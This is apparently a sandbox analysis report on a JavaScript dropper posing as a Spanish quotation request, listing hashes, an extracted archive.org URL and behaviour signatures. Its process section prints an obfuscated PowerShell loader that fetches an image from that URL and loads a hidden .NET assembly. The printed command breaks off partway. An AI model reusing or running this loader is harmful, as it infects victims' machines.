Resubmissions
29/08/2024, 01:48
240829-b78d1sxfjd 10Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
29/08/2024, 01:48
Static task
static1
Behavioral task
behavioral1
Sample
SOLICITUD DE COTIZACIÓN CONSULTA ABB1VCF349750R09095.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
SOLICITUD DE COTIZACIÓN CONSULTA ABB1VCF349750R09095.js
Resource
win10v2004-20240802-en
General
-
Target
SOLICITUD DE COTIZACIÓN CONSULTA ABB1VCF349750R09095.js
-
Size
615KB
-
MD5
3b76608f01f7d04c7f25d4d967bee3fc
-
SHA1
086e7223511a9292efffc218e5041cf941203751
-
SHA256
2119893dc47b5db45de446a7ae2cee26d9306617d6eb99ecdaad3bf276682da0
-
SHA512
1cb4c2906da652068a552ae2f93c94cb1a6f21c8e4a268f66c02acc55f587a0bea47322d62b9faac5e0785cb04e91967eb3d8cd450c4493b9b168c1e498f567e
-
SSDEEP
12288:UWaIMfBcvb0vq/EJYjfJ5dguMEDuHq7muy8EGnmYPaNM13tc46J4YGy7yW8oBYUU:UWYA9/IzrBJHbMP5d
Malware Config
Extracted
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2772 powershell.exe 6 2772 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2740 powershell.exe 2772 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2740 powershell.exe 2772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2740 powershell.exe Token: SeDebugPrivilege 2772 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2728 wrote to memory of 2740 2728 wscript.exe 30 PID 2728 wrote to memory of 2740 2728 wscript.exe 30 PID 2728 wrote to memory of 2740 2728 wscript.exe 30 PID 2740 wrote to memory of 2772 2740 powershell.exe 32 PID 2740 wrote to memory of 2772 2740 powershell.exe 32 PID 2740 wrote to memory of 2772 2740 powershell.exe 32
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\SOLICITUD DE COTIZACIÓN CONSULTA ABB1VCF349750R09095.js"1⤵
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⛜ ⨅ ␆ △ ╓Bp⛜ ⨅ ␆ △ ╓G0⛜ ⨅ ␆ △ ╓YQBn⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓VQBy⛜ ⨅ ␆ △ ╓Gw⛜ ⨅ ␆ △ ╓I⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓9⛜ ⨅ ␆ △ ╓C⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓JwBo⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓d⛜ ⨅ ␆ △ ╓Bw⛜ ⨅ ␆ △ ╓HM⛜ ⨅ ␆ △ ╓Og⛜ ⨅ ␆ △ ╓v⛜ ⨅ ␆ △ ╓C8⛜ ⨅ ␆ △ ╓aQBh⛜ ⨅ ␆ △ ╓DY⛜ ⨅ ␆ △ ╓M⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓x⛜ ⨅ ␆ △ ╓DY⛜ ⨅ ␆ △ ╓M⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓2⛜ ⨅ ␆ △ ╓C4⛜ ⨅ ␆ △ ╓dQBz⛜ ⨅ ␆ △ ╓C4⛜ ⨅ ␆ △ ╓YQBy⛜ ⨅ ␆ △ ╓GM⛜ ⨅ ␆ △ ╓a⛜ ⨅ ␆ △ ╓Bp⛜ ⨅ ␆ △ ╓HY⛜ ⨅ ␆ △ ╓ZQ⛜ ⨅ ␆ △ ╓u⛜ ⨅ ␆ △ ╓G8⛜ ⨅ ␆ △ ╓cgBn⛜ ⨅ ␆ △ ╓C8⛜ ⨅ ␆ △ ╓MQ⛜ ⨅ ␆ △ ╓w⛜ ⨅ ␆ △ ╓C8⛜ ⨅ ␆ △ ╓aQB0⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓bQBz⛜ ⨅ ␆ △ ╓C8⛜ ⨅ ␆ △ ╓Z⛜ ⨅ ␆ △ ╓Bl⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓d⛜ ⨅ ␆ △ ╓Bo⛜ ⨅ ␆ △ ╓G4⛜ ⨅ ␆ △ ╓bwB0⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓Xw⛜ ⨅ ␆ △ ╓y⛜ ⨅ ␆ △ ╓D⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓Mg⛜ ⨅ ␆ △ ╓0⛜ ⨅ ␆ △ ╓D⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓Nw⛜ ⨅ ␆ △ ╓v⛜ ⨅ ␆ △ ╓GQ⛜ ⨅ ␆ △ ╓ZQBh⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓a⛜ ⨅ ␆ △ ╓Bu⛜ ⨅ ␆ △ ╓G8⛜ ⨅ ␆ △ ╓d⛜ ⨅ ␆ △ ╓Bl⛜ ⨅ ␆ △ ╓C4⛜ ⨅ ␆ △ ╓agBw⛜ ⨅ ␆ △ ╓Gc⛜ ⨅ ␆ △ ╓Jw⛜ ⨅ ␆ △ ╓7⛜ ⨅ ␆ △ ╓CQ⛜ ⨅ ␆ △ ╓dwBl⛜ ⨅ ␆ △ ╓GI⛜ ⨅ ␆ △ ╓QwBs⛜ ⨅ ␆ △ ╓Gk⛜ ⨅ ␆ △ ╓ZQBu⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓I⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓9⛜ ⨅ ␆ △ ╓C⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓TgBl⛜ ⨅ ␆ △ ╓Hc⛜ ⨅ ␆ △ ╓LQBP⛜ ⨅ ␆ △ ╓GI⛜ ⨅ ␆ △ ╓agBl⛜ ⨅ ␆ △ ╓GM⛜ ⨅ ␆ △ ╓d⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓g⛜ ⨅ ␆ △ ╓FM⛜ ⨅ ␆ △ ╓eQBz⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓ZQBt⛜ ⨅ ␆ △ ╓C4⛜ ⨅ ␆ △ ╓TgBl⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓LgBX⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓YgBD⛜ ⨅ ␆ △ ╓Gw⛜ ⨅ ␆ △ ╓aQBl⛜ ⨅ ␆ △ ╓G4⛜ ⨅ ␆ △ ╓d⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓7⛜ ⨅ ␆ △ ╓CQ⛜ ⨅ ␆ △ ╓aQBt⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓ZwBl⛜ ⨅ ␆ △ ╓EI⛜ ⨅ ␆ △ ╓eQB0⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓cw⛜ ⨅ ␆ △ ╓g⛜ ⨅ ␆ △ ╓D0⛜ ⨅ ␆ △ ╓I⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓k⛜ ⨅ ␆ △ ╓Hc⛜ ⨅ ␆ △ ╓ZQBi⛜ ⨅ ␆ △ ╓EM⛜ ⨅ ␆ △ ╓b⛜ ⨅ ␆ △ ╓Bp⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓bgB0⛜ ⨅ ␆ △ ╓C4⛜ ⨅ ␆ △ ╓R⛜ ⨅ ␆ △ ╓Bv⛜ ⨅ ␆ △ ╓Hc⛜ ⨅ ␆ △ ╓bgBs⛜ ⨅ ␆ △ ╓G8⛜ ⨅ ␆ △ ╓YQBk⛜ ⨅ ␆ △ ╓EQ⛜ ⨅ ␆ △ ╓YQB0⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓K⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓k⛜ ⨅ ␆ △ ╓Gk⛜ ⨅ ␆ △ ╓bQBh⛜ ⨅ ␆ △ ╓Gc⛜ ⨅ ␆ △ ╓ZQBV⛜ ⨅ ␆ △ ╓HI⛜ ⨅ ␆ △ ╓b⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓p⛜ ⨅ ␆ △ ╓Ds⛜ ⨅ ␆ △ ╓J⛜ ⨅ ␆ △ ╓Bp⛜ ⨅ ␆ △ ╓G0⛜ ⨅ ␆ △ ╓YQBn⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓V⛜ ⨅ ␆ △ ╓Bl⛜ ⨅ ␆ △ ╓Hg⛜ ⨅ ␆ △ ╓d⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓g⛜ ⨅ ␆ △ ╓D0⛜ ⨅ ␆ △ ╓I⛜ ⨅ ␆ △ ╓Bb⛜ ⨅ ␆ △ ╓FM⛜ ⨅ ␆ △ ╓eQBz⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓ZQBt⛜ ⨅ ␆ △ ╓C4⛜ ⨅ ␆ △ ╓V⛜ ⨅ ␆ △ ╓Bl⛜ ⨅ ␆ △ ╓Hg⛜ ⨅ ␆ △ ╓d⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓u⛜ ⨅ ␆ △ ╓EU⛜ ⨅ ␆ △ ╓bgBj⛜ ⨅ ␆ △ ╓G8⛜ ⨅ ␆ △ ╓Z⛜ ⨅ ␆ △ ╓Bp⛜ ⨅ ␆ △ ╓G4⛜ ⨅ ␆ △ ╓ZwBd⛜ ⨅ ␆ △ ╓Do⛜ ⨅ ␆ △ ╓OgBV⛜ ⨅ ␆ △ ╓FQ⛜ ⨅ ␆ △ ╓Rg⛜ ⨅ ␆ △ ╓4⛜ ⨅ ␆ △ ╓C4⛜ ⨅ ␆ △ ╓RwBl⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓UwB0⛜ ⨅ ␆ △ ╓HI⛜ ⨅ ␆ △ ╓aQBu⛜ ⨅ ␆ △ ╓Gc⛜ ⨅ ␆ △ ╓K⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓k⛜ ⨅ ␆ △ ╓Gk⛜ ⨅ ␆ △ ╓bQBh⛜ ⨅ ␆ △ ╓Gc⛜ ⨅ ␆ △ ╓ZQBC⛜ ⨅ ␆ △ ╓Hk⛜ ⨅ ␆ △ ╓d⛜ ⨅ ␆ △ ╓Bl⛜ ⨅ ␆ △ ╓HM⛜ ⨅ ␆ △ ╓KQ⛜ ⨅ ␆ △ ╓7⛜ ⨅ ␆ △ ╓CQ⛜ ⨅ ␆ △ ╓cwB0⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓cgB0⛜ ⨅ ␆ △ ╓EY⛜ ⨅ ␆ △ ╓b⛜ ⨅ ␆ △ ╓Bh⛜ ⨅ ␆ △ ╓Gc⛜ ⨅ ␆ △ ╓I⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓9⛜ ⨅ ␆ △ ╓C⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓Jw⛜ ⨅ ␆ △ ╓8⛜ ⨅ ␆ △ ╓Dw⛜ ⨅ ␆ △ ╓QgBB⛜ ⨅ ␆ △ ╓FM⛜ ⨅ ␆ △ ╓RQ⛜ ⨅ ␆ △ ╓2⛜ ⨅ ␆ △ ╓DQ⛜ ⨅ ␆ △ ╓XwBT⛜ ⨅ ␆ △ ╓FQ⛜ ⨅ ␆ △ ╓QQBS⛜ ⨅ ␆ △ ╓FQ⛜ ⨅ ␆ △ ╓Pg⛜ ⨅ ␆ △ ╓+⛜ ⨅ ␆ △ ╓Cc⛜ ⨅ ␆ △ ╓Ow⛜ ⨅ ␆ △ ╓k⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓bgBk⛜ ⨅ ␆ △ ╓EY⛜ ⨅ ␆ △ ╓b⛜ ⨅ ␆ △ ╓Bh⛜ ⨅ ␆ △ ╓Gc⛜ ⨅ ␆ △ ╓I⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓9⛜ ⨅ ␆ △ ╓C⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓Jw⛜ ⨅ ␆ △ ╓8⛜ ⨅ ␆ △ ╓Dw⛜ ⨅ ␆ △ ╓QgBB⛜ ⨅ ␆ △ ╓FM⛜ ⨅ ␆ △ ╓RQ⛜ ⨅ ␆ △ ╓2⛜ ⨅ ␆ △ ╓DQ⛜ ⨅ ␆ △ ╓XwBF⛜ ⨅ ␆ △ ╓E4⛜ ⨅ ␆ △ ╓R⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓+⛜ ⨅ ␆ △ ╓D4⛜ ⨅ ␆ △ ╓Jw⛜ ⨅ ␆ △ ╓7⛜ ⨅ ␆ △ ╓CQ⛜ ⨅ ␆ △ ╓cwB0⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓cgB0⛜ ⨅ ␆ △ ╓Ek⛜ ⨅ ␆ △ ╓bgBk⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓e⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓g⛜ ⨅ ␆ △ ╓D0⛜ ⨅ ␆ △ ╓I⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓k⛜ ⨅ ␆ △ ╓Gk⛜ ⨅ ␆ △ ╓bQBh⛜ ⨅ ␆ △ ╓Gc⛜ ⨅ ␆ △ ╓ZQBU⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓e⛜ ⨅ ␆ △ ╓B0⛜ ⨅ ␆ △ ╓C4⛜ ⨅ ␆ △ ╓SQBu⛜ ⨅ ␆ △ ╓GQ⛜ ⨅ ␆ △ ╓ZQB4⛜ ⨅ ␆ △ ╓E8⛜ ⨅ ␆ △ ╓Zg⛜ ⨅ ␆ △ ╓o⛜ ⨅ ␆ △ ╓CQ⛜ ⨅ ␆ △ ╓cwB0⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓cgB0⛜ ⨅ ␆ △ ╓EY⛜ ⨅ ␆ △ ╓b⛜ ⨅ ␆ △ ╓Bh⛜ ⨅ ␆ △ ╓Gc⛜ ⨅ ␆ △ ╓KQ⛜ ⨅ ␆ △ ╓7⛜ ⨅ ␆ △ ╓CQ⛜ ⨅ ␆ △ ╓ZQBu⛜ ⨅ ␆ △ ╓GQ⛜ ⨅ ␆ △ ╓SQBu⛜ ⨅ ␆ △ ╓GQ⛜ ⨅ ␆ △ ╓ZQB4⛜ ⨅ ␆ △ ╓C⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓PQ⛜ ⨅ ␆ △ ╓g⛜ ⨅ ␆ △ ╓CQ⛜ ⨅ ␆ △ ╓aQBt⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓ZwBl⛜ ⨅ ␆ △ ╓FQ⛜ ⨅ ␆ △ ╓ZQB4⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓LgBJ⛜ ⨅ ␆ △ ╓G4⛜ ⨅ ␆ △ ╓Z⛜ ⨅ ␆ △ ╓Bl⛜ ⨅ ␆ △ ╓Hg⛜ ⨅ ␆ △ ╓TwBm⛜ ⨅ ␆ △ ╓Cg⛜ ⨅ ␆ △ ╓J⛜ ⨅ ␆ △ ╓Bl⛜ ⨅ ␆ △ ╓G4⛜ ⨅ ␆ △ ╓Z⛜ ⨅ ␆ △ ╓BG⛜ ⨅ ␆ △ ╓Gw⛜ ⨅ ␆ △ ╓YQBn⛜ ⨅ ␆ △ ╓Ck⛜ ⨅ ␆ △ ╓Ow⛜ ⨅ ␆ △ ╓k⛜ ⨅ ␆ △ ╓HM⛜ ⨅ ␆ △ ╓d⛜ ⨅ ␆ △ ╓Bh⛜ ⨅ ␆ △ ╓HI⛜ ⨅ ␆ △ ╓d⛜ ⨅ ␆ △ ╓BJ⛜ ⨅ ␆ △ ╓G4⛜ ⨅ ␆ △ ╓Z⛜ ⨅ ␆ △ ╓Bl⛜ ⨅ ␆ △ ╓Hg⛜ ⨅ ␆ △ ╓I⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓t⛜ ⨅ ␆ △ ╓Gc⛜ ⨅ ␆ △ ╓ZQ⛜ ⨅ ␆ △ ╓g⛜ ⨅ ␆ △ ╓D⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓I⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓t⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓bgBk⛜ ⨅ ␆ △ ╓C⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓J⛜ ⨅ ␆ △ ╓Bl⛜ ⨅ ␆ △ ╓G4⛜ ⨅ ␆ △ ╓Z⛜ ⨅ ␆ △ ╓BJ⛜ ⨅ ␆ △ ╓G4⛜ ⨅ ␆ △ ╓Z⛜ ⨅ ␆ △ ╓Bl⛜ ⨅ ␆ △ ╓Hg⛜ ⨅ ␆ △ ╓I⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓t⛜ ⨅ ␆ △ ╓Gc⛜ ⨅ ␆ △ ╓d⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓g⛜ ⨅ ␆ △ ╓CQ⛜ ⨅ ␆ △ ╓cwB0⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓cgB0⛜ ⨅ ␆ △ ╓Ek⛜ ⨅ ␆ △ ╓bgBk⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓e⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓7⛜ ⨅ ␆ △ ╓CQ⛜ ⨅ ␆ △ ╓cwB0⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓cgB0⛜ ⨅ ␆ △ ╓Ek⛜ ⨅ ␆ △ ╓bgBk⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓e⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓g⛜ ⨅ ␆ △ ╓Cs⛜ ⨅ ␆ △ ╓PQ⛜ ⨅ ␆ △ ╓g⛜ ⨅ ␆ △ ╓CQ⛜ ⨅ ␆ △ ╓cwB0⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓cgB0⛜ ⨅ ␆ △ ╓EY⛜ ⨅ ␆ △ ╓b⛜ ⨅ ␆ △ ╓Bh⛜ ⨅ ␆ △ ╓Gc⛜ ⨅ ␆ △ ╓LgBM⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓bgBn⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓a⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓7⛜ ⨅ ␆ △ ╓CQ⛜ ⨅ ␆ △ ╓YgBh⛜ ⨅ ␆ △ ╓HM⛜ ⨅ ␆ △ ╓ZQ⛜ ⨅ ␆ △ ╓2⛜ ⨅ ␆ △ ╓DQ⛜ ⨅ ␆ △ ╓T⛜ ⨅ ␆ △ ╓Bl⛜ ⨅ ␆ △ ╓G4⛜ ⨅ ␆ △ ╓ZwB0⛜ ⨅ ␆ △ ╓Gg⛜ ⨅ ␆ △ ╓I⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓9⛜ ⨅ ␆ △ ╓C⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓J⛜ ⨅ ␆ △ ╓Bl⛜ ⨅ ␆ △ ╓G4⛜ ⨅ ␆ △ ╓Z⛜ ⨅ ␆ △ ╓BJ⛜ ⨅ ␆ △ ╓G4⛜ ⨅ ␆ △ ╓Z⛜ ⨅ ␆ △ ╓Bl⛜ ⨅ ␆ △ ╓Hg⛜ ⨅ ␆ △ ╓I⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓t⛜ ⨅ ␆ △ ╓C⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓J⛜ ⨅ ␆ △ ╓Bz⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓YQBy⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓SQBu⛜ ⨅ ␆ △ ╓GQ⛜ ⨅ ␆ △ ╓ZQB4⛜ ⨅ ␆ △ ╓Ds⛜ ⨅ ␆ △ ╓J⛜ ⨅ ␆ △ ╓Bi⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓cwBl⛜ ⨅ ␆ △ ╓DY⛜ ⨅ ␆ △ ╓N⛜ ⨅ ␆ △ ╓BD⛜ ⨅ ␆ △ ╓G8⛜ ⨅ ␆ △ ╓bQBt⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓bgBk⛜ ⨅ ␆ △ ╓C⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓PQ⛜ ⨅ ␆ △ ╓g⛜ ⨅ ␆ △ ╓CQ⛜ ⨅ ␆ △ ╓aQBt⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓ZwBl⛜ ⨅ ␆ △ ╓FQ⛜ ⨅ ␆ △ ╓ZQB4⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓LgBT⛜ ⨅ ␆ △ ╓HU⛜ ⨅ ␆ △ ╓YgBz⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓cgBp⛜ ⨅ ␆ △ ╓G4⛜ ⨅ ␆ △ ╓Zw⛜ ⨅ ␆ △ ╓o⛜ ⨅ ␆ △ ╓CQ⛜ ⨅ ␆ △ ╓cwB0⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓cgB0⛜ ⨅ ␆ △ ╓Ek⛜ ⨅ ␆ △ ╓bgBk⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓e⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓s⛜ ⨅ ␆ △ ╓C⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓J⛜ ⨅ ␆ △ ╓Bi⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓cwBl⛜ ⨅ ␆ △ ╓DY⛜ ⨅ ␆ △ ╓N⛜ ⨅ ␆ △ ╓BM⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓bgBn⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓a⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓p⛜ ⨅ ␆ △ ╓Ds⛜ ⨅ ␆ △ ╓J⛜ ⨅ ␆ △ ╓Bj⛜ ⨅ ␆ △ ╓G8⛜ ⨅ ␆ △ ╓bQBt⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓bgBk⛜ ⨅ ␆ △ ╓EI⛜ ⨅ ␆ △ ╓eQB0⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓cw⛜ ⨅ ␆ △ ╓g⛜ ⨅ ␆ △ ╓D0⛜ ⨅ ␆ △ ╓I⛜ ⨅ ␆ △ ╓Bb⛜ ⨅ ␆ △ ╓FM⛜ ⨅ ␆ △ ╓eQBz⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓ZQBt⛜ ⨅ ␆ △ ╓C4⛜ ⨅ ␆ △ ╓QwBv⛜ ⨅ ␆ △ ╓G4⛜ ⨅ ␆ △ ╓dgBl⛜ ⨅ ␆ △ ╓HI⛜ ⨅ ␆ △ ╓d⛜ ⨅ ␆ △ ╓Bd⛜ ⨅ ␆ △ ╓Do⛜ ⨅ ␆ △ ╓OgBG⛜ ⨅ ␆ △ ╓HI⛜ ⨅ ␆ △ ╓bwBt⛜ ⨅ ␆ △ ╓EI⛜ ⨅ ␆ △ ╓YQBz⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓Ng⛜ ⨅ ␆ △ ╓0⛜ ⨅ ␆ △ ╓FM⛜ ⨅ ␆ △ ╓d⛜ ⨅ ␆ △ ╓By⛜ ⨅ ␆ △ ╓Gk⛜ ⨅ ␆ △ ╓bgBn⛜ ⨅ ␆ △ ╓Cg⛜ ⨅ ␆ △ ╓J⛜ ⨅ ␆ △ ╓Bi⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓cwBl⛜ ⨅ ␆ △ ╓DY⛜ ⨅ ␆ △ ╓N⛜ ⨅ ␆ △ ╓BD⛜ ⨅ ␆ △ ╓G8⛜ ⨅ ␆ △ ╓bQBt⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓bgBk⛜ ⨅ ␆ △ ╓Ck⛜ ⨅ ␆ △ ╓Ow⛜ ⨅ ␆ △ ╓k⛜ ⨅ ␆ △ ╓Gw⛜ ⨅ ␆ △ ╓bwBh⛜ ⨅ ␆ △ ╓GQ⛜ ⨅ ␆ △ ╓ZQBk⛜ ⨅ ␆ △ ╓EE⛜ ⨅ ␆ △ ╓cwBz⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓bQBi⛜ ⨅ ␆ △ ╓Gw⛜ ⨅ ␆ △ ╓eQ⛜ ⨅ ␆ △ ╓g⛜ ⨅ ␆ △ ╓D0⛜ ⨅ ␆ △ ╓I⛜ ⨅ ␆ △ ╓Bb⛜ ⨅ ␆ △ ╓FM⛜ ⨅ ␆ △ ╓eQBz⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓ZQBt⛜ ⨅ ␆ △ ╓C4⛜ ⨅ ␆ △ ╓UgBl⛜ ⨅ ␆ △ ╓GY⛜ ⨅ ␆ △ ╓b⛜ ⨅ ␆ △ ╓Bl⛜ ⨅ ␆ △ ╓GM⛜ ⨅ ␆ △ ╓d⛜ ⨅ ␆ △ ╓Bp⛜ ⨅ ␆ △ ╓G8⛜ ⨅ ␆ △ ╓bg⛜ ⨅ ␆ △ ╓u⛜ ⨅ ␆ △ ╓EE⛜ ⨅ ␆ △ ╓cwBz⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓bQBi⛜ ⨅ ␆ △ ╓Gw⛜ ⨅ ␆ △ ╓eQBd⛜ ⨅ ␆ △ ╓Do⛜ ⨅ ␆ △ ╓OgBM⛜ ⨅ ␆ △ ╓G8⛜ ⨅ ␆ △ ╓YQBk⛜ ⨅ ␆ △ ╓Cg⛜ ⨅ ␆ △ ╓J⛜ ⨅ ␆ △ ╓Bj⛜ ⨅ ␆ △ ╓G8⛜ ⨅ ␆ △ ╓bQBt⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓bgBk⛜ ⨅ ␆ △ ╓EI⛜ ⨅ ␆ △ ╓eQB0⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓cw⛜ ⨅ ␆ △ ╓p⛜ ⨅ ␆ △ ╓Ds⛜ ⨅ ␆ △ ╓J⛜ ⨅ ␆ △ ╓B0⛜ ⨅ ␆ △ ╓Hk⛜ ⨅ ␆ △ ╓c⛜ ⨅ ␆ △ ╓Bl⛜ ⨅ ␆ △ ╓C⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓PQ⛜ ⨅ ␆ △ ╓g⛜ ⨅ ␆ △ ╓CQ⛜ ⨅ ␆ △ ╓b⛜ ⨅ ␆ △ ╓Bv⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓Z⛜ ⨅ ␆ △ ╓Bl⛜ ⨅ ␆ △ ╓GQ⛜ ⨅ ␆ △ ╓QQBz⛜ ⨅ ␆ △ ╓HM⛜ ⨅ ␆ △ ╓ZQBt⛜ ⨅ ␆ △ ╓GI⛜ ⨅ ␆ △ ╓b⛜ ⨅ ␆ △ ╓B5⛜ ⨅ ␆ △ ╓C4⛜ ⨅ ␆ △ ╓RwBl⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓V⛜ ⨅ ␆ △ ╓B5⛜ ⨅ ␆ △ ╓H⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓ZQ⛜ ⨅ ␆ △ ╓o⛜ ⨅ ␆ △ ╓Cc⛜ ⨅ ␆ △ ╓Z⛜ ⨅ ␆ △ ╓Bu⛜ ⨅ ␆ △ ╓Gw⛜ ⨅ ␆ △ ╓aQBi⛜ ⨅ ␆ △ ╓C4⛜ ⨅ ␆ △ ╓SQBP⛜ ⨅ ␆ △ ╓C4⛜ ⨅ ␆ △ ╓S⛜ ⨅ ␆ △ ╓Bv⛜ ⨅ 